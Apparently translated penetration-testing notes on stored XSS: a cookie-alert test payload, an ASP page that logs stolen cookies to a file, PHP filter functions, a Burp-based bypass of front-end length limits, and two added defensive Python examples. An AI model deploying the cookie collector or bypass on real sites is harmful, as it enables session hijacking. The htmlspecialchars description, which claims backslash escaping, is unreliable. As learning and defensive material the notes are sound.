Description: An attacker inserts malicious script code into a web page; when a user browses that page, the embedded script code is executed in the user's browser, achieving the attacker's goal.
Trigger: occurs on the target site, at the level of the target user's browser.
Common locations: public message boards, publicly visible text fields.
Test methods:
(1) Cookie pop-up box
<script>alert(document.cookie)</script>
(2) Cookies written to a file in the attacker's folder (receiver page, ASP):
    <html>
    <title>xx</title>
    <body>
    <%
    testfile = Server.MapPath("code.txt")    ' build a path rooted at the site root; code.txt is created in the root directory and its path kept in testfile
    msg = Request("msg")                     ' read the submitted msg variable, i.e. the cookie value
    Set fs = Server.CreateObject("Scripting.FileSystemObject")    ' create the FileSystemObject
    Set thisFile = fs.OpenTextFile(testfile, 8, True, 0)          ' open code.txt for appending, creating it if missing
    thisFile.WriteLine("" & msg & "")        ' write the received cookie into code.txt
    thisFile.Close()                         ' close the file
    Set fs = Nothing
    %>
    </body>
    </html>
Approach:
Use filtering: every parameter is passed through the handling program's filter. 1. Escape special characters (&lt;, &gt;, &quot;). 2. Input containing sensitive HTML or script is discarded outright.
Common XSS filtering:
1. htmlspecialchars() function
It can escape single quotes '', double quotes "", and slash / backslash \, i.e. it prefixes these symbols with the escape marker \.
However, by default the function encodes double quotes and slashes (/ \); if you want a single quote encoded as well, you need to add a parameter.
2. strip_tags() function
Handles the angle brackets (tag markup).
3. addslashes
Escapes single and double quotation marks by prefixing them with a \.
4. addslashes() function
Predefined characters: ' " \ NULL
The function prefixes these four characters with \.
5. What I have seen during penetration testing is that the key symbols are basically < > ' " ( ), etc.
These symbols are entity-encoded,
or the symbols are filtered out directly,
and then keywords such as alert, script, src, img, etc. are filtered out.
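As an added example (not code from the original notes), the following Python mirrors the three PHP functions listed above, htmlspecialchars(), strip_tags() and addslashes(), and runs them over the pop-up payload from test method (1) and over a quoted string, so the differences are visible side by side: entity encoding leaves the payload unable to open a tag, the single quote is only encoded when the ENT_QUOTES-style flag is set, strip_tags removes the markup but keeps the text, and addslashes only touches quotes and leaves `<script>` intact, which is why it is the wrong tool for an HTML context. The function names, the regex stand-in for strip_tags and the sample strings are this example's own assumptions.

```python
import html
import re

# Constructed sample inputs for the demonstration. The first is the
# pop-up payload from the notes above; the second is a harmless string
# chosen to exercise quote handling.
PAYLOAD_TEXT = "<script>alert(document.cookie)</script>"
PAYLOAD_QUOTES = "it's a \"quoted\" value"


def entity_encode(value: str, encode_single_quote: bool = False) -> str:
    """Entity-encode like PHP htmlspecialchars().

    PHP's default (ENT_COMPAT) converts & < > and the double quote; the
    single quote is only converted when ENT_QUOTES is passed. Python's
    html.escape(quote=True) converts both quote kinds, so the default
    case is assembled by hand to mirror PHP's behaviour.
    """
    if encode_single_quote:
        return html.escape(value, quote=True)           # ENT_QUOTES analogue
    return html.escape(value, quote=False).replace('"', "&quot;")


def add_slashes(value: str) -> str:
    """Mimic PHP addslashes(): a backslash before ' " \\ and NUL.

    The backslash itself is doubled first so later replacements do not
    re-escape the backslashes this function inserts.
    """
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\0", "\\0"))


TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value: str) -> str:
    """Approximate PHP strip_tags(): drop every <...> sequence.

    PHP's real implementation is a state machine; this regex stand-in is
    enough to show what survives once the tags are gone.
    """
    return TAG_RE.sub("", value)


def inert_in_text_context(rendered: str) -> bool:
    """True when `rendered` can no longer open or close a tag in HTML text."""
    return "<" not in rendered and ">" not in rendered


def inert_in_attr_context(rendered: str, quote: str) -> bool:
    """True when `rendered` cannot break out of an attribute delimited by `quote`."""
    return quote not in rendered and "<" not in rendered


def compare_filters(value: str) -> dict:
    """Run every filter on one value so the outputs can be compared side by side."""
    return {
        "htmlspecialchars": entity_encode(value),
        "htmlspecialchars+ENT_QUOTES": entity_encode(value, encode_single_quote=True),
        "strip_tags": strip_tags(value),
        "addslashes": add_slashes(value),
    }


if __name__ == "__main__":
    single_quote = "'"
    for sample in (PAYLOAD_TEXT, PAYLOAD_QUOTES):
        print(f"input: {sample!r}")
        for name, out in compare_filters(sample).items():
            print(f"  {name:28} -> {out!r}"
                  f"  text-inert={inert_in_text_context(out)}"
                  f"  attr(')-inert={inert_in_attr_context(out, single_quote)}")
```

The two `inert_*` checks make the point of the section concrete: which filter is adequate depends on where the value is rendered, and a value that is safe in HTML text (entities for `<` and `>`) can still close a single-quoted attribute unless the single quote is encoded too.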
Sometimes there is a front-end JS check that limits the length of the input string, so a complete XSS statement cannot be built;
but if you inspect the page elements and find the corresponding code, the limit can be modified,
or you can enter a legitimate string and then use Burp Suite to capture and change it.
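Because the front-end length check described above can be edited out of the page or changed in a proxy, the server has to enforce its own limit and encode what it stores. The following Python is an added example, not code from the original notes: a handler for the message-board msg parameter that re-checks the length on the server, entity-encodes the stored value, and flags any value longer than the form's maxlength as a tamper signal worth logging, since an unmodified browser form could not have produced it. The limits, IP addresses and sample requests are constructed for the demonstration.

```python
import html
from dataclasses import dataclass
from typing import Optional

# Constructed limits for the demonstration. FORM_MAXLENGTH stands for the
# maxlength= attribute the page sends to the browser; SERVER_MAXLENGTH is
# the limit the handler enforces itself. Only the latter is authoritative.
FORM_MAXLENGTH = 50
SERVER_MAXLENGTH = 200


@dataclass
class Decision:
    accepted: bool
    reason: str
    tamper_suspected: bool        # True when the client-side limit was evidently bypassed
    stored_value: Optional[str]   # entity-encoded, inert in an HTML text context


def handle_message(params: dict) -> Decision:
    """Server-side handling of the message-board 'msg' parameter.

    The browser's maxlength check is treated as advisory: the length is
    re-checked here, and a value longer than what the form allows is
    flagged, because an unmodified form could not have submitted it.
    """
    raw = params.get("msg")
    if raw is None:
        return Decision(False, "missing msg parameter", False, None)
    tamper = len(raw) > FORM_MAXLENGTH
    if len(raw) > SERVER_MAXLENGTH:
        return Decision(False, f"length {len(raw)} exceeds server limit {SERVER_MAXLENGTH}",
                        tamper, None)
    # Output encoding happens regardless of any earlier filtering: the
    # stored form is what gets rendered, so it must be inert in HTML text.
    return Decision(True, "accepted", tamper, html.escape(raw, quote=True))


def audit_line(client_ip: str, raw_len: int, decision: Decision) -> str:
    """One log line per request, with an explicit TAMPER marker for alerting."""
    marker = "TAMPER" if decision.tamper_suspected else "ok"
    verdict = "accept" if decision.accepted else "reject"
    return (f"ip={client_ip} msg_len={raw_len} form_max={FORM_MAXLENGTH} "
            f"verdict={verdict} tamper={marker} reason={decision.reason!r}")


# Constructed sample requests: a normal post, the pop-up payload from the
# notes, a value longer than the form permits (as if edited in a proxy),
# and one past the server's own limit.
SAMPLE_REQUESTS = [
    ("203.0.113.10", {"msg": "hello board"}),
    ("203.0.113.11", {"msg": "<script>alert(document.cookie)</script>"}),
    ("203.0.113.12", {"msg": "A" * 80}),
    ("203.0.113.13", {"msg": "B" * 300}),
]


def process_all(requests=SAMPLE_REQUESTS) -> list:
    """Return (decision, log line) pairs for every sample request."""
    results = []
    for ip, params in requests:
        decision = handle_message(params)
        results.append((decision, audit_line(ip, len(params.get("msg", "")), decision)))
    return results


if __name__ == "__main__":
    for _, line in process_all():
        print(line)
```

The 80-character request is still accepted (it is within the server's own limit) but logged with the TAMPER marker, which is the useful detection signal: a submission that exceeds the form's declared maxlength means the client-side check was altered or bypassed, exactly the technique the notes describe.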